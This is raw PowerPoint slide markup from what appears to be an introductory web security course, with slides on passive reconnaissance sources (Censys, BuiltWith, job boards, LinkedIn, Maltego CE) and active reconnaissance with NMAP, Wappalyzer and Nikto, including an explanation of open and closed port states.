        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology – Passive Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F492162-AC7C-404F-9A7E-1B5DE1FEE2AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Censys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D4989D-3669-404D-802D-07BDD4679280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="992458" y="2357358"/>
            <a:ext cx="9170020" cy="4161468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2370156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26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="65652"/>
            <a:ext cx="4724400" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP Top Ten (2017 Edition)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="1524000"/>
          <a:ext cx="9220200" cy="5014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6</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78009775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1F785-61F4-4D94-8519-D1952831CF18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology – Passive Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F60BA388-2363-4491-8A1A-160EABD21C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>BuiltWith</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAFCDB2-58D4-4492-B23A-9BD2F349EFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514490" y="2726420"/>
            <a:ext cx="11163020" cy="2913213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171633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175F2-A168-4842-A0CB-8A35FA60960E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology – Passive Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F4F94A6-A9EC-48AA-95CD-7427565DFF3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Job Boards </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Indeed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Linkedin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9F43C3-D19A-4DE4-A6E0-D4FB625DD072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5002266" y="1975406"/>
            <a:ext cx="1676190" cy="704762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8471E451-19D7-4CE4-BF89-2AB458FDD1EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5048381" y="3095666"/>
            <a:ext cx="2095238" cy="666667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F4F19F-6F44-4EBE-A74D-CFD1D36BA692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148381" y="4220439"/>
            <a:ext cx="1895238" cy="1447619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1522254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4849A-D188-40F1-BAAE-07F1A2F155CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A67B5A3-0708-45F1-AEF9-9BD5427AA65B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3381153" y="3687277"/>
            <a:ext cx="5698675" cy="2502682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92163B1-1D08-43BF-8767-34F7A7F336FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542260" y="1828800"/>
            <a:ext cx="11446540" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t> CE is the community version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t> that is available for free after a quick online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>registration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t> CE includes most of the same functionality as the commercial version however it has some limitations. The main limitation with the community version is that the application cannot be used for commercial purposes and there is also a limitation on the maximum number of entities that can be returned from a single transform. In the community version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t> there is no graph export functionality that is available in the commercial versions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22911080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4FBB6-F4A4-4BAE-8D37-B5B62DE192DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology - Active</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7EB60D-B5A7-4E79-8641-F663129E346B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon (Passive and Active)  ** MOST IMPORTANT**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools – Active</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NMAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wappalyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Fingerprint the Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31303914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 - Active</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580536"/>
            <a:ext cx="10972800" cy="4790767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DISCOVER – RECON – Active </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NMAP – Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MAPper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nmap.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://nmap.org/download.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>  - Windows, Linux, or Mac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> - Source Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Note: See The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>MAN PAGE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>for more info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{046845C2-DBEE-4CA5-B510-4998ADB645D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6816163" y="2077121"/>
            <a:ext cx="1666667" cy="914286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4108556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NMAP</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98323" y="1494503"/>
            <a:ext cx="11484077" cy="4896465"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NMAP – Host, Port, Operating System, Service &amp; Version Detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NMAP – TCP handshake </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Accepting connections requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 6" descr="C:\Users\NCOOPE~1\AppData\Local\Temp\SNAGHTMLb79b8a.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66BF56E4-7D50-47CB-8908-EA0C36598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78" y="3744209"/>
            <a:ext cx="5093798" cy="22141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NCOOPE~1\AppData\Local\Temp\SNAGHTMLb72ed6.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA059D70-0627-4479-A572-671A4B8DC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8600" y="3744208"/>
            <a:ext cx="5050011" cy="221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3092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NMAP</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lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D99307-5FD3-403C-9576-EB80B3D120CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292646" y="1978739"/>
            <a:ext cx="5445385" cy="2332760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{453340F1-6E88-443F-AA0D-0DB4EEA5BB22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208796" y="1835637"/>
            <a:ext cx="5480804" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Closed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This indicates that the probes were received but there is no application listening on this port.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49429591-4756-4870-B3AC-03652783C4F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292646" y="4474939"/>
            <a:ext cx="5445385" cy="2019536"/>
          </a:xfrm>
